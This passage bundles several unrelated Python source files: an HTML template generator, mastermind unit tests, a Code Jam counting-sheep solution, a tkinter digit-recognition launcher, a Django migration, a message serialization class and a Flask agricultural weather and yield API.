                                (svg_path, topic.id))
        template = template.replace('{{field-icons}}', icons)
    return template
def generate_garant(g_template, s_template, garant, topics, index):
    """Fill one garant template: name, alternating section color, intro,
    and (when the template asks for them) the garant's rendered topics."""
    color = 'blue' if index % 2 == 0 else 'gray'
    filled = (g_template
              .replace('{{name}}', garant.name)
              .replace('{{color}}', color)
              .replace('{{intro}}', garant.intro))
    if '{{topics}}' in filled:
        rendered = ''.join(generate_soc(s_template, t) for t in topics)
        filled = filled.replace('{{topics}}', rendered)
    return filled
def generate_garants(index_t, output, topic_t, garant_t, topics, garants):
    """Render the index template line by line into *output*.

    A line containing {{garants}} is replaced by the rendered garant
    sections (the line itself is not written); {{about-color}} continues
    the alternating color sequence; every line may carry a
    {{build_datetime}} placeholder.
    """
    topic_template = topic_t.read()
    garant_template = garant_t.read()
    # Hoisted out of the loop: the timestamp is loop-invariant and
    # strftime was previously re-evaluated for every template line.
    stamp = datetime.datetime.now().strftime("%-d. %-m. %Y")
    for raw_line in index_t:
        line = raw_line.replace('{{build_datetime}}', stamp)
        if '{{garants}}' in line:
            for i, garant in enumerate(garants):
                # lazy filter is consumed inside generate_garant within
                # this same iteration, so the closure binding is safe
                filtered_topics = filter(
                    lambda x: x.garant == garant.name, topics
                )
                output.write(generate_garant(
                    garant_template, topic_template, garant, filtered_topics, i
                ) + '\n')
        elif '{{about-color}}' in line:
            output.write(line.replace(
                '{{about-color}}',
                'blue' if len(garants) % 2 == 0 else 'gray'
            ))
        else:
            output.write(line)
if __name__ == '__main__':
    args = parse_args(sys.argv)
    if args.garants is None:
        sys.stderr.write('You must provide garants filename!\n')
        sys.exit(1)
    # Output target: the -o file, or stdout when none was given.
    output = open(args.ofn, 'w', encoding='utf-8') if args.ofn else sys.stdout
    # Topic CSV sources: the -t files, or stdin when none were given.
    topic_files = ([open(filename, 'r', encoding='utf-8') for filename in args.topics]
                   if args.topics else [sys.stdin])
    garants = open(args.garants, 'r', encoding='utf-8')
    # The topic and garant templates live next to the -m root template.
    template_dir = os.path.dirname(args.template)
    path_index = args.template
    path_topic = os.path.join(template_dir, TEMPLATE_TOPIC)
    path_garant = os.path.join(template_dir, TEMPLATE_GARANT)
    topics = []
    for topic_file in topic_files:
        topics += parser.parse_topic_csv(topic_file)
    # Keep only topics whose state was requested via -s.
    topics = list(filter(lambda topic: topic.state in args.states, topics))
    topics.sort()
    garants = parser.parse_garant_csv(garants)
    with open(path_index, 'r', encoding='utf-8') as index,\
        open(path_topic, 'r', encoding='utf-8') as topic,\
        open(path_garant, 'r', encoding='utf-8') as garant:
        generate_garants(index, output, topic, garant, topics, garants)
    # NOTE(review): the comment below is optimistic — `output`, the topic
    # files and the garants file are never explicitly closed; they are
    # only released at interpreter exit.
    # ofn will be closed automatically here
|
# encoding: utf-8
import pytest
from mastermind_code import mastermind
def test_should_return_list():
    """The mastermind result is a plain list."""
    outcome = mastermind(['red'], ['red'])
    assert isinstance(outcome, list)
def test_should_return_list_with_2_components():
    """The result holds exactly two counters: [well placed, misplaced].

    The previous assertion (len > 0) never actually checked the
    two-component shape the test name promises.
    """
    response = mastermind(['red'], ['red'])
    assert len(response) == 2
def test_should_return_int_list_components():
    """Both counters in the result are integers."""
    outcome = mastermind(['red'], ['red'])
    first, second = outcome[0], outcome[1]
    assert isinstance(first, int)
    assert isinstance(second, int)
def test_should_return_well_placed_for_minimum_case():
    """An exact single-peg match counts as one well-placed, zero misplaced."""
    outcome = mastermind(['red'], ['red'])
    assert outcome[0] == 1 and outcome[1] == 0
def test_should_return_incorrect_for_minimum_case():
    """A completely wrong single-peg guess scores zero on both counters."""
    outcome = mastermind(['red'], ['blue'])
    assert outcome[0] == 0 and outcome[1] == 0
def test_should_return_miss_placed_for_minimum_case():
    """A color present but in the wrong slot counts as misplaced only."""
    outcome = mastermind(['red', 'blue'], ['blue', 'yellow'])
    assert outcome[0] == 0 and outcome[1] == 1
def test_should_raise_value_error_if_different_len():
    """Secret and guess of different lengths must be rejected."""
    with pytest.raises(ValueError):
        mastermind(['red', 'blue'], ['yellow'])
|
#'''
def amount_people(PP):
    """Return the largest attendance deficit found while scanning *PP*
    (a sequence of digit counts) from its high end.

    For each suffix of the reversed counts, the deficit is
    (sum of suffix) - (length of suffix); the first position only
    records non-positive deficits, later positions only strictly
    negative ones that beat the current maximum.
    """
    best = 0
    reversed_counts = [int(x) for x in PP[::-1]]
    for idx in range(len(PP) - 1):
        tail = reversed_counts[idx + 1:]
        deficit = sum(tail) - len(tail)
        if idx == 0:
            # first position: a surplus is ignored, a deficit is recorded
            if deficit <= 0:
                best = abs(deficit)
        elif deficit < 0 and abs(deficit) > best:
            best = abs(deficit)
    return best
def formatValue(Ns):
    """Split the first token of *Ns* into its digits.

    Returns a pair: (list of the token's digits as ints, the token as one int).
    """
    token = Ns[0]
    digits = [int(ch) for ch in token]
    return digits, int(token)
# Driver for Google Code Jam 2016 Qualification A ("Counting Sheep"):
# for each N, count multiples of N until all ten digits have been seen.
Padd = 0
countLine=0
countCase = 1
result = 0
#example.in
#D-small-practice.in
#'A-EX.in'
#'A-small-attempt0.in'
with open('A-large.in','r') as ifile, open('outputJam2016-A-large.out','w') as ofile, open('debug.out','w') as oDfile, open('dataRcheck.out','w') as oRfile:
    for line in ifile :
        #print (line)
        print("6666666666666666666666666666666666666666666666666")
        if countLine == 0 :
            # first input line: the number of test cases
            case = line.split()
            case = int(case[0])
            print ("case : ",case)
            #case = int(line.split())
        elif countLine >= 1 and countCase >= 0 and countCase <= case :
            Ns = line.split()
            #Nchar = map(int,list(Ns[0]))
            #Nchar=line.strip()
            #wList[:0] = w
            #intNchar = map(int,Nchar)
            #N = int(Ns[0])
            Nchar, N = formatValue(Ns)
            #,' intNchar : ',intNchar
            print(" Ns : ",Ns," N : ",N,' Nchar : ',Nchar)
            #,' ns[3][1] : ',Ns[2][1]
            if N == 0 :
                # multiples of 0 never reveal new digits
                result = 'INSOMNIA'
            else :
                # digits seen so far, seeded with N's own digits
                NcharAll = Nchar[:]
                # dead experiment kept as a no-op string literal:
                '''
                print("NcharAll : ",NcharAll,len(set(NcharAll)))
                #NcharAll.extend(['2','3'])
                #print("NcharAll : ",NcharAll)
                N=N*2
                print("N : ",N)
                N = str(N)
                print("N : ",N)
                Ns = N.split()
                print("Ns : ",Ns)
                Nchar, N = formatValue(Ns)
                print("Nchar : ",Nchar)
                NcharAll.extend(Nchar)
                print("NcharAll : ",NcharAll)
                '''
                i=2
                # keep counting N*2, N*3, ... until all 10 digits were seen
                while len(set(NcharAll))<10 :
                    #print("set(NcharAll) : ",set(NcharAll))
                    newN=N*i
                    i=i+1
                    #print("newN : ",newN)
                    newN = str(newN)
                    #print("N : ",N)
                    Ns = newN.split()
                    #print("Ns : ",Ns)
                    Nchar, newN = formatValue(Ns)
                    print("newN : ",newN)
                    #print("Nchar : ",Nchar)
                    NcharAll.extend(Nchar)
                    #print("NcharAll : ",NcharAll)
                print("set(NcharAll) : ",set(NcharAll))
                #print("solution : ",newN)
                #print("test")
                # NOTE(review): if N alone already contains all ten digits the
                # loop body never runs and newN is unbound here (NameError);
                # the expected answer in that case would be N itself.
                result = newN
                #if
            # leftover from a different problem, kept as a no-op string literal:
            '''
            [M, PP] = map(str, line.split())
            M = int(M)
            PP = str(PP)
            PP = iter(PP)
            PP = ' '.join(PP)
            PP = PP.split()
            result = amount_people(PP)
            '''
            outLine = 'Case #'+str(countCase)+': '+str(result)+'\n'
            print(outLine)
            ofile.write(outLine)
            countCase = countCase + 1
        else :
            # NOTE(review): printDebug is not defined anywhere in this file —
            # reaching this branch raises NameError.
            printDebug("IMPORSIBLE ??!!",99)
        if countCase > case :
            #print("break")
            break
        countLine = countLine + 1
# Redundant: the with-statement above already closed these files;
# close() on a closed file object is a harmless no-op.
ifile.close()
ofile.close()
oDfile.close()
oRfile.close()
|
# -*- coding: utf-8 -*-
"""
Created on Sat Jun 1 15:38:43 2019
@author: 10670
"""
import sys; sys.path
from tkinter import*
import GUI_CeShi
def main():
    """Show the entry window of the handwritten-digit recognition system."""
    root = Tk()
    root.title("手写数字识别系统")
    # welcome label
    welcome = Label(root, text="欢迎来到手写数字识别系统")
    welcome.grid(row=0, column=0, padx=30, pady=5)
    # hint label telling the user what to do
    hint = Label(root, text="点击开始按钮进入系统")
    hint.grid(row=1, column=0, padx=30, pady=5)
    # start button opens the recognition GUI
    start = Button(root, text="开始", bg="light blue", command=GUI_CeShi.main)
    start.grid(row=2, column=0, padx=30, pady=5)
    root.mainloop()
def shibie():
    # Placeholder ("shibie" = "recognize"); no recognition logic exists here yet.
    pass
# Launch the GUI only when run as a script, not on import.
if __name__ == '__main__':
    main()
# Generated by Django 3.1.4 on 2021-01-04 07:17
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Auto-generated (Django 3.1.4). Moves product images out of the
    # single Product.image field into a new Gallery model so one product
    # can carry many images, one optionally flagged as the main image.

    dependencies = [
        ('mainapp', '0001_initial'),
    ]

    operations = [
        # Drop the old single-image field from Product.
        migrations.RemoveField(
            model_name='product',
            name='image',
        ),
        # Gallery rows point back at their product; deleting the product
        # cascades to its gallery images (related_name='gallery').
        migrations.CreateModel(
            name='Gallery',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('is_main', models.BooleanField(default=False)),
                ('image', models.ImageField(blank=True, upload_to='product_images')),
                ('product', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='gallery', to='mainapp.product')),
            ],
        ),
    ]
|
from __future__ import annotations
import json
from datetime import datetime
from typing import TypeVar, Generic, Callable, Any
import util
MessageContent = TypeVar("MessageContent")
class _Keys:
    """JSON field names used by Message.encode() and Message.decode()."""
    SENDER: str = "sender"    # message author
    CONTENT: str = "content"  # payload (any JSON-serializable value)
    TOPIC: str = "topic"      # routing topic
    DATE: str = "date"        # UNIX timestamp in seconds
class Message(Generic[MessageContent]):
    """A topic-tagged message carrying a sender, a payload and a timestamp."""

    def __init__(self, sender: str, topic: str, content: MessageContent, date: datetime):
        self.sender = sender
        self.topic = topic
        self.content = content
        self.date = date

    def encode(self) -> str:
        """Serialize the message to JSON.

        The representation holds the sender, content, topic and the
        date as a UNIX timestamp.

        Returns:
            The JSON representation of the message.
        """
        payload = {
            _Keys.SENDER: self.sender,
            _Keys.CONTENT: self.content,
            _Keys.TOPIC: self.topic,
            _Keys.DATE: self.date.timestamp(),
        }
        return json.dumps(payload)

    @staticmethod
    def decode(json_message: str) -> Message[MessageContent]:
        """Rebuild a message from its JSON representation.

        Args:
            json_message: JSON string as produced by encode(); must carry
                sender, topic, content and a UNIX timestamp.

        Returns:
            The decoded message.

        Raises:
            AssertionError: If a required field is missing.
        """
        data = json.loads(json_message)
        # every required field must be present before construction
        util.assert_keys_exist([_Keys.SENDER, _Keys.TOPIC, _Keys.CONTENT, _Keys.DATE], data)
        return Message(
            data[_Keys.SENDER],
            data[_Keys.TOPIC],
            data[_Keys.CONTENT],
            datetime.fromtimestamp(data[_Keys.DATE]),
        )

    def __repr__(self):
        return f"Message[#{self.sender}: {self.topic}: {self.date}: {self.content}]"
# Type alias for subscriber callbacks: invoked with each delivered Message.
Callback = Callable[[Message], Any]
|
import os
from datetime import datetime
from zipfile import ZipFile, ZIP_DEFLATED
import pandas as pd
from flask import Flask, jsonify, send_from_directory, request, send_file
from flask_cors import CORS
from flask_httpauth import HTTPBasicAuth
from werkzeug.security import generate_password_hash, check_password_hash
from statistics_data_fetcher import fetch_rainfall_whole_data, fetch_temp_whole_data, fetch_humidity_whole_data
from weather_filters import multiple_states, single_loc, multiple_dists
from yield_filters import multiple_states_yield, single_loc_yield, multiple_dists_yield
app = Flask(__name__)
auth = HTTPBasicAuth()
CORS(app)  # allow cross-origin requests from the web client

# Response-body key names shared by the JSON endpoints below.
_keyNameTemperature = 'temperature'
_keyNameHumidity = 'humidity'
_keyNameRainfall = 'rainfall'
_keyNameDists = 'dists'
_keyNameDistrict = 'district'
_keyNameState = 'state'
_keyNameStates = 'states'
_keyNameId = 'id'
_keyNameStateId = 'state_id'
_keyNameSeasons = 'seasons'
_keyNameCrops = 'crops'
_keyNameYield = 'yield'
_keyNameName = 'name'
_keyNameCropId = 'crop_id'

# Query-parameter names accepted by the endpoints.
_queryParamState = 'state'
_queryParamDist = 'dist'
_queryParamStates = 'states'
_queryParamDists = 'dists'
_queryParamYears = 'years'
_queryParamParams = 'params'
_queryParamStateId = 'state_id'
_queryParamDistId = 'dist_id'
_queryParamSeason = 'season'
_queryParamCrop = 'crop'

# HTTP basic-auth user store.
# NOTE(review): credentials are hard-coded in source — move the password
# to configuration/environment before deployment.
users = {
    "sughosh": generate_password_hash("hello")
}
@auth.verify_password
def verify_password(username, password):
    """Basic-auth callback: return the username on valid credentials,
    otherwise fall through to None (authentication failure)."""
    stored_hash = users.get(username)
    if stored_hash is not None and check_password_hash(stored_hash, password):
        print('Authenticated')
        return username
@app.route('/')
def home():
    """Simple liveness endpoint returning the service name."""
    print(f'/home endpoint called ')
    return 'Agri Guide'
@app.route('/weather')
def weather():
    """Return predicted temperature, humidity and rainfall lists for a district.

    Query params: state, dist. Responds 404 when a parameter is missing
    or no prediction CSVs exist for the location.
    """
    state = request.args.get(_queryParamState)
    dist = request.args.get(_queryParamDist)
    # Validate before use: previously .replace() ran first, so a missing
    # parameter raised AttributeError instead of returning the 404 below.
    if state is None or dist is None:
        return jsonify({'message': 'The requested location cannot be processed'}), 404
    state = state.replace(' ', '+')
    dist = dist.replace(' ', '+')
    print(f'/weather endpoint called with state={state} and dist={dist}')
    if state == 'Test' and dist == 'Test':
        # fixed payload for integration tests
        return jsonify({_keyNameTemperature: [1, ],
                        _keyNameHumidity: [2, ],
                        _keyNameRainfall: [3, ]})
    files1 = os.listdir('outputs/temp')
    files2 = os.listdir('outputs/humidity')
    files3 = os.listdir('outputs/rainfall')
    file = dist + ',' + state + '.csv'
    try:
        # Predictions must already exist on disk for all three metrics.
        if file not in files1:
            # temperature_caller(state, dist)
            return jsonify({'message': 'The requested location cannot be processed'}), 404
        if file not in files2:
            # humidity_caller(state, dist)
            return jsonify({'message': 'The requested location cannot be processed'}), 404
        if file not in files3:
            # rain_caller(state, dist)
            return jsonify({'message': 'The requested location cannot be processed'}), 404
        print(f'All weather prediction complete for state={state} and dist={dist}')
        df1 = pd.read_csv(f'outputs/temp/{file}')
        df2 = pd.read_csv(f'outputs/humidity/{file}')
        df3 = pd.read_csv(f'outputs/rainfall/{file}')
        my_values = {
            _keyNameTemperature: df1['Predicted'].to_list(),
            _keyNameHumidity: df2['Predicted'].to_list(),
            _keyNameRainfall: df3['Predicted'].round(2).to_list()
        }
        return jsonify(my_values), 200
    except FileNotFoundError:
        return jsonify({'message': 'The requested location cannot be processed'}), 404
def create_file_name():
    """Return a timestamped zip name in the form YYYYMMDDHHMM.zip.

    Uses zero-padded strftime fields: the previous unpadded string
    concatenation produced ambiguous, collision-prone names (e.g.
    month=1/day=14 and month=11/day=4 both yielded '...114...').
    """
    return datetime.now().strftime('%Y%m%d%H%M') + '.zip'
def clear_file_contents(param):
    """Truncate the cached filter-output CSV for *param*.

    'yield' lives under filter_outputs/yield/, everything else under
    filter_outputs/weather/. Opening in 'w+' truncates (and creates the
    file if absent); the context manager guarantees the close.
    """
    subdir = 'yield' if param == 'yield' else 'weather'
    with open(f'filter_outputs/{subdir}/{param}.csv', 'w+'):
        pass
@app.route('/agri_guide/downloads')
def download_with_filters():
    """
    states: List of states\n
    dists: Will be used only when len(states) == 1\n
    years: If years == 0 then all years else will accept length of 2\n
    params: temp,humidity,rainfall,yield\n
    :return: ZIP file containing the required CSV files
    """
    states = request.args.getlist(_queryParamStates)
    dists = request.args.getlist(_queryParamDists)
    years = request.args.getlist(_queryParamYears)
    params = request.args.getlist(_queryParamParams)
    try:
        # Each list param may arrive as one comma-separated token; expand
        # it, then normalize spaces to '+' as the data files expect.
        if len(states) == 1:
            states = states[0].split(',')
        states = [state.replace(' ', '+') for state in states]
        if len(dists) == 1:
            dists = dists[0].split(',')
        dists = [dist.replace(' ', '+') for dist in dists]
        if len(years) == 1:
            years = years[0].split(',')
        years = [int(i) for i in years]
        if len(params) == 1:
            params = params[0].split(',')
        print(f'/agri_guide/downloads endpoint called with states={states}, '
              f'dists={dists}, years={years} and params={params}')
        # Start from empty CSVs so rows from a previous request cannot
        # leak into this download.
        clear_file_contents('temp')
        clear_file_contents('humidity')
        clear_file_contents('rain')
        clear_file_contents('yield')
        # Weather filtering, dispatched on how specific the location is.
        if len(states) > 1:
            multiple_states(states, years, params)
        if len(states) == 1 and len(dists) > 1:
            multiple_dists(states[0], dists, years, params)
        if len(states) == 1 and len(dists) == 1:
            if dists == ['0']:
                # '0' means "all districts of the state"
                multiple_dists(states[0], dists, years, params)
            else:
                single_loc(states[0], dists[0], years, params)
        try:
            if 'yield' in params:
                if len(states) > 1:
                    multiple_states_yield(states)
                if len(states) == 1 and len(dists) > 1:
                    multiple_dists_yield(states[0], dists)
                if len(states) == 1 and len(dists) == 1:
                    if dists == ['0']:
                        multiple_dists_yield(states[0], dists)
                    else:
                        single_loc_yield(states[0], dists[0])
        except Exception:
            # Yield data is best-effort: keep serving the weather files.
            # (Narrowed from a bare `except:`.)
            print(f'yield data not found for states={states} and dists={dists}')
        handle = ZipFile('required_downloads.zip', 'w')
        if 'temp' in params:
            handle.write('filter_outputs/weather/temp.csv', 'temperature.csv', compress_type=ZIP_DEFLATED)
        if 'humidity' in params:
            handle.write('filter_outputs/weather/humidity.csv', 'humidity.csv', compress_type=ZIP_DEFLATED)
        if 'rainfall' in params:
            handle.write('filter_outputs/weather/rain.csv', 'rainfall.csv', compress_type=ZIP_DEFLATED)
        if 'yield' in params:
            handle.write('filter_outputs/yield/yield.csv', 'yield.csv', compress_type=ZIP_DEFLATED)
        handle.close()
        print(f'ZipFile created for states={states}, '
              f'dists={dists}, years={years} and params={params}')
        # NOTE(review): attachment_filename was renamed download_name in
        # Flask 2.0 — confirm the pinned Flask version still supports it.
        response = send_file('required_downloads.zip', as_attachment=True, attachment_filename=create_file_name())
        return response, 200
    except Exception:
        # Narrowed from a bare `except:` so SystemExit/KeyboardInterrupt
        # propagate; any processing failure maps to a 404 response.
        return jsonify({'message': 'The requested location cannot be processed'}), 404
@app.route('/weather/downloads')
def download_weather_filters():
    """
    states: List of states\n
    dists: Will be used only when len(states) == 1\n
    years: If years == 0 then all years else will accept length of 2\n
    params: temp,humidity,rainfall\n
    :return: ZIP file containing the required CSV files
    """
    states = request.args.getlist(_queryParamStates)
    dists = request.args.getlist(_queryParamDists)
    years = request.args.getlist(_queryParamYears)
    params = request.args.getlist(_queryParamParams)
    try:
        # Each list param may arrive as one comma-separated token; expand
        # it, then normalize spaces to '+' as the data files expect.
        if len(states) == 1:
            states = states[0].split(',')
        states = [state.replace(' ', '+') for state in states]
        if len(dists) == 1:
            dists = dists[0].split(',')
        dists = [dist.replace(' ', '+') for dist in dists]
        if len(years) == 1:
            years = years[0].split(',')
        years = [int(i) for i in years]
        if len(params) == 1:
            params = params[0].split(',')
        print(f'/weather/downloads endpoint called with states={states}, '
              f'dists={dists}, years={years} and params={params}')
        # NOTE(review): unlike /agri_guide/downloads, this endpoint never
        # calls clear_file_contents() first — stale rows from a previous
        # request may be included. Confirm whether that is intended.
        if len(states) > 1:
            multiple_states(states, years, params)
        if len(states) == 1 and len(dists) > 1:
            multiple_dists(states[0], dists, years, params)
        if len(states) == 1 and len(dists) == 1:
            if dists == ['0']:
                # '0' means "all districts of the state"
                multiple_dists(states[0], dists, years, params)
            else:
                single_loc(states[0], dists[0], years, params)
        handle = ZipFile('required_downloads.zip', 'w')
        if 'temp' in params:
            handle.write('filter_outputs/weather/temp.csv', 'temperature.csv', compress_type=ZIP_DEFLATED)
        if 'humidity' in params:
            handle.write('filter_outputs/weather/humidity.csv', 'humidity.csv', compress_type=ZIP_DEFLATED)
        if 'rainfall' in params:
            handle.write('filter_outputs/weather/rain.csv', 'rainfall.csv', compress_type=ZIP_DEFLATED)
        handle.close()
        print(f'ZipFile created for states={states}, '
              f'dists={dists}, years={years} and params={params}')
        # NOTE(review): attachment_filename was renamed download_name in
        # Flask 2.0 — confirm the pinned Flask version still supports it.
        response = send_file('required_downloads.zip', as_attachment=True, attachment_filename=create_file_name())
        return response, 200
    except Exception:
        # Narrowed from a bare `except:` so SystemExit/KeyboardInterrupt
        # propagate; any processing failure maps to a 404 response.
        return jsonify({'message': 'The requested location cannot be processed'}), 404
@app.route('/weather/files')
@auth.login_required
def download_weather_predicted_files():
    """Send the raw predicted CSVs for one district, zipped (auth required)."""
    state = request.args.get(_queryParamState)
    dist = request.args.get(_queryParamDist)
    # Validate before use: previously .replace() ran first, so a missing
    # parameter raised AttributeError instead of returning the 404 below.
    if state is None or dist is None:
        return jsonify({'message': 'The requested location cannot be processed'}), 404
    state = state.replace(' ', '+')
    dist = dist.replace(' ', '+')
    print(f'/weather/files endpoint called with state={state} and '
          f'dist={dist}')
    files3 = os.listdir('outputs/rainfall')
    file = dist + ',' + state + '.csv'
    if file in files3:
        handle = ZipFile(f'{dist},{state}.zip', 'w')
        handle.write(f'outputs/temp/{file}', 'temperature.csv', compress_type=ZIP_DEFLATED)
        handle.write(f'outputs/humidity/{file}', 'humidity.csv', compress_type=ZIP_DEFLATED)
        # Fixed copy-paste bug: rainfall.csv previously re-packaged the
        # temperature file (outputs/temp) instead of outputs/rainfall.
        handle.write(f'outputs/rainfall/{file}', 'rainfall.csv', compress_type=ZIP_DEFLATED)
        handle.close()
        print(f'ZipFile created for state={state} and '
              f'dist={dist}')
        return send_from_directory('', f'{dist},{state}.zip', as_attachment=True)
    else:
        return jsonify({'message': 'File not found'}), 404
def preprocessing(s):
    """Turn a URL-style location name ('tamil+nadu') into display form
    ('Tamil Nadu'): '+' becomes a space, then title-case."""
    return s.replace('+', ' ').title()
@app.route('/get_states')
def get_state():
    """List all states as [{id, name}]; id is the 1-based position in places.csv."""
    isTest = request.args.get('isTest')
    print(f'/get_states endpoint called')
    # Test mode short-circuits before the remote CSV download below;
    # previously the download and list building ran even for test calls.
    if isTest == 'true':
        return jsonify({_keyNameState: [{_keyNameId: 'Test', _keyNameName: 'Test'}, ]})
    base_url = 'https://raw.githubusercontent.com/bssughosh/agri-guide-data/master/datasets/weather/'
    file = 'places.csv'
    df = pd.read_csv(base_url + file)
    df['State'] = df['State'].apply(lambda c: preprocessing(c))
    states = list(df['State'].unique())
    res1 = [{_keyNameId: str(i + 1), _keyNameName: name}
            for i, name in enumerate(states)]
    return jsonify({_keyNameState: res1}), 200
@app.route('/get_state_value')
def get_state_for_state_id():
    """Resolve 1-based state ids (possibly comma-separated) back to state names."""
    state_id = request.args.getlist(_queryParamStateId)
    if len(state_id) == 1:
        state_id = state_id[0].split(',')
    state_id = [(int(s) - 1) for s in state_id]
    print(f'/get_state_value endpoint called with state_id={state_id}')
    # Test sentinel (query id 1001 → internal 1000) now short-circuits
    # before the remote CSV download; previously the download ran first.
    if state_id == [1000, ]:
        return jsonify({_keyNameStates: ['Test', ]})
    base_url = 'https://raw.githubusercontent.com/bssughosh/agri-guide-data/master/datasets/weather/'
    file = 'places.csv'
    df = pd.read_csv(base_url + file)
    # NOTE(review): unlike /get_states, names are NOT run through
    # preprocessing() here — confirm whether raw CSV casing is intended.
    states = list(df['State'].unique())
    res = []
    for s in state_id:
        res.append(states[s])
    print(f'/get_state_value endpoint returned => {res}')
    return jsonify({_keyNameStates: res}), 200
@app.route('/get_dists')
def get_dist():
    """Return the districts of one state as [{id, state_id, name}].

    `id` is the row index in places.csv; `state_id` is the 1-based state
    position derived from row order.
    """
    state_id = request.args.get(_queryParamStateId)
    if state_id is None:
        return jsonify({'message': 'State ID not found'}), 404
    try:
        state_id = int(state_id)
        # 1000 is the test-mode sentinel id used across these endpoints
        if state_id == 1000:
            return jsonify({_keyNameDistrict: [{_keyNameId: 'Test', _keyNameStateId: 'Test', _keyNameName: 'Test'}, ]})
    except ValueError:
        return jsonify({'message': 'State ID not found'}), 404
    print(f'/get_dists endpoint called with state_id={state_id}')
    base_url = 'https://raw.githubusercontent.com/bssughosh/agri-guide-data/master/datasets/weather/'
    file = 'places.csv'
    df = pd.read_csv(base_url + file)
    df['State'] = df['State'].apply(lambda c: preprocessing(c))
    df['District'] = df['District'].apply(lambda c: preprocessing(c))
    res = {}
    res1 = []
    # Walk the rows in file order, bumping k each time the state column
    # (column 0) changes; rows whose running state index matches the
    # requested id are collected.
    # NOTE(review): assumes places.csv rows are grouped by state — confirm.
    k = 1
    p = df.iloc[0, 0]
    for i, j in df.iterrows():
        if j[0] != p:
            k += 1
            p = j[0]
        if state_id == k:
            t = {_keyNameId: str(i), _keyNameStateId: str(k), _keyNameName: j[1]}
            res1.append(t)
    res[_keyNameDistrict] = res1
    return jsonify(res), 200
@app.route('/get_dist_value')
def get_dist_for_dist_id():
    """Resolve row-index district ids (possibly comma-separated) to district names."""
    dist_id = request.args.getlist(_queryParamDistId)
    if len(dist_id) == 1:
        dist_id = dist_id[0].split(',')
    dist_id = [int(d) for d in dist_id]
    print(f'/get_dist_value endpoint called with dist_id={dist_id}')
    # Test sentinel now short-circuits before the remote CSV download;
    # previously the download ran even for test calls.
    if dist_id == [1000, ]:
        return jsonify({_keyNameDists: ['Test', ]})
    base_url = 'https://raw.githubusercontent.com/bssughosh/agri-guide-data/master/datasets/weather/'
    file = 'places.csv'
    df = pd.read_csv(base_url + file)
    # NOTE(review): names are not run through preprocessing() here,
    # unlike /get_dists — confirm whether raw CSV casing is intended.
    dists = list(df['District'])
    res = []
    for d in dist_id:
        res.append(dists[d])
    print(f'/get_dist_value endpoint returned => {res}')
    return jsonify({_keyNameDists: res}), 200
@app.route('/get_seasons')
def get_seasons():
    """List the crop seasons recorded for one state/district pair."""
    state = request.args.get(_queryParamState)
    dist = request.args.get(_queryParamDist)
    # Log message fixed: it previously claimed '/get_types_of_crops'.
    print(f'/get_seasons endpoint called with state={state} and '
          f'dist={dist}')
    if state == 'Test' and dist == 'Test':
        return jsonify({_keyNameSeasons: ['Test', ]})
    base_url = 'https://raw.githubusercontent.com/bssughosh/agri-guide-data/master/datasets/yield/'
    file = 'found1_all_18.csv'
    df = pd.read_csv(base_url + file)
    df1 = df[df['State'] == state]
    df1 = df1[df1['District'] == dist]
    seasons = []
    if df1.shape[0] > 0:
        seasons = list(df1['Season'].unique())
    return jsonify({_keyNameSeasons: seasons}), 200
@app.route('/get_crops')
def get_crops():
    """Return the crops grown for a state/district/season combination.

    Each crop is paired with a stable id: its position in the dataset-wide
    list of unique crops. 'Test'/'Test'/'Test' is a sentinel.
    """
    state = request.args.get(_queryParamState)
    dist = request.args.get(_queryParamDist)
    season = request.args.get(_queryParamSeason)
    print(f'/get_crops endpoint called with state={state}, '
          f'dist={dist} and season={season}')
    if state == 'Test' and dist == 'Test' and season == 'Test':
        return jsonify({_keyNameCrops: [{_keyNameCropId: 'Test', _keyNameName: 'Test', }, ]})
    df = pd.read_csv(
        'https://raw.githubusercontent.com/bssughosh/agri-guide-data/master/datasets/yield/'
        + 'found1_all_18.csv')
    # Crop id = position of the crop in the dataset-wide unique-crop list.
    all_crops_dict = {crop: str(pos) for pos, crop in enumerate(df['Crop'].unique())}
    subset = df[df['State'] == state]
    subset = subset[subset['District'] == dist]
    subset = subset[subset['Season'] == season]
    crops_res = []
    if subset.shape[0] > 0:
        crops_res = [
            {_keyNameCropId: all_crops_dict[crop], _keyNameName: crop, }
            for crop in subset['Crop'].unique()
        ]
    return jsonify({_keyNameCrops: crops_res}), 200
@app.route('/yield')
def predict_yield():
    """Return the precomputed yield prediction series for one location/crop.

    Query params: state, dist, season, crop. Spaces in state/dist are
    normalized to '+' to match the output-file naming scheme. Responds 404
    when any param is missing or no prediction file exists.
    """
    state = request.args.get(_queryParamState)
    dist = request.args.get(_queryParamDist)
    season = request.args.get(_queryParamSeason)
    crop = request.args.get(_queryParamCrop)
    # BUG FIX: validate BEFORE calling .replace() — previously a missing
    # state/dist raised AttributeError (HTTP 500) instead of returning 404.
    if state is None or dist is None or season is None or crop is None:
        return jsonify({'message': 'The requested location cannot be processed'}), 404
    state = state.replace(' ', '+')
    dist = dist.replace(' ', '+')
    print(f'/yield endpoint called with state={state}, '
          f'dist={dist}, season={season} and crop={crop}')
    if state == 'Test' and dist == 'Test' and season == 'Test' and crop == 'Test':
        return jsonify({_keyNameYield: [1.0, ]})
    files = os.listdir('outputs/yield')
    file = dist + ',' + state + ',' + season + ',' + crop + '.csv'
    try:
        if file not in files:
            # On-demand generation is disabled; missing files are a 404.
            # yield_caller(state, dist, season, crop)
            return jsonify({'message': 'The requested location cannot be processed'}), 404
        print(f'All yield prediction complete for state={state}, dist={dist}'
              f', season={season} and crop={crop}')
        df1 = pd.read_csv(f'outputs/yield/{file}')
        my_values = {
            _keyNameYield: df1['Predicted'].to_list(),
        }
        return jsonify(my_values), 200
    except FileNotFoundError:
        # File vanished between listdir and read, or outputs/ is missing.
        return jsonify({'message': 'The requested location cannot be processed'}), 404
@app.route('/statistics_data')
def generate_statistics_data():
    """Return historic temperature, humidity and rainfall series for a
    state/district pair.

    Query params: state, dist. Spaces are normalized to '+'. Responds 404
    when either param is missing or a data fetch fails.
    """
    state = request.args.get(_queryParamState)
    dist = request.args.get(_queryParamDist)
    # BUG FIX: validate BEFORE calling .replace() — previously a missing
    # state/dist raised AttributeError (HTTP 500) instead of returning 404.
    if state is None or dist is None:
        return jsonify({'message': 'The requested location cannot be processed'}), 404
    state = state.replace(' ', '+')
    dist = dist.replace(' ', '+')
    print(f'/statistics_data endpoint called with state={state} and '
          f'dist={dist}')
